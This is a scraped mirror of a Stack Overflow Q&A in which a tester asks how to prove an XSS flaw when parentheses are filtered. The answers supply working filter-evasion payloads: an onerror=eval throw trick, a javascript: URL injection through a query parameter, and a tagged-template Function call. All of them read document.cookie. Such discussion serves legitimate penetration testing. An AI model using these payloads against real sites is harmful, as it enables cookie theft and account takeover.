admin管理员组文章数量:1404460
I have found that Cross Site Scripting vulnerability in a client's application. The problem is that the vulnerable parameter does not accept parentheses. So something like alert(document.cookie) will be rejected because of parentheses. I can get XSS using alert `xss` but I my client requires a proof of being able to access the DOM.
In other words, How can I alert(document.cookie) without parentheses , are there any alternatives?
Thanks!
I have found that Cross Site Scripting vulnerability in a client's application. The problem is that the vulnerable parameter does not accept parentheses. So something like alert(document.cookie) will be rejected because of parentheses. I can get XSS using alert `xss` but I my client requires a proof of being able to access the DOM.
In other words, How can I alert(document.cookie) without parentheses , are there any alternatives?
Thanks!
Share Improve this question asked Nov 30, 2016 at 21:33 user00239123user00239123 2784 silver badges16 bronze badges 2- There are no alternatives for a method call. However through the careful application of an implicit eval there does not need for parenthesis to appear in source code - and not all code requires parenthesis to do 'interesting' things. I'm not sure how the conclusion relates to XSS though.. – user2864740 Commented Nov 30, 2016 at 21:38
- XSS Filter Evasion Cheat Sheet includes a number of techniques including ones that avoid parenthesis (certain conditions apply). – Ouroborus Commented Nov 30, 2016 at 21:47
3 Answers
Reset to default 6document.body.innerHTML=document.cookie will display the cookies on the page itself.
Speaking of the XSS vulnerability: Yes, it is vulnerable and disabling parentheses will just force attackers to use more creative methods. Letting someone execute any arbitrary code is a liability.
Here's a simple example of how you can call any function with any parameters without using any parentheses in your input:
<p>Malicious input: window.onerror=eval;throw '=1;alert\u0028document.location\u0029'</p>
<input type="button" onclick="window.onerror=eval;throw '=1;alert\u0028document.location\u0029'" value="Click me">This is another solution that worked for me:
<script>
var firstname = 'aa';document.location='javascript:alert%28document.cookie%29';//';
</script>
The payload would be:
?vulnparam=aa';document.location='javascript:alert%2528document.cookie%2529';//
@tcooc answer is also working.
This works without using = also
<script>Function`X${alert`${document.cookie}`}```</script>
本文标签: javascriptparentheses alternatives in JSif anyStack Overflow
版权声明:本文标题:javascript - parentheses alternatives in JS , if any? - Stack Overflow 内容由网友自发贡献,该文观点仅代表作者本人, 转载请联系作者并注明出处:http://www.betaflare.com/web/1744805369a2626113.html, 本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌抄袭侵权/违法违规的内容,一经查实,本站将立刻删除。
发表评论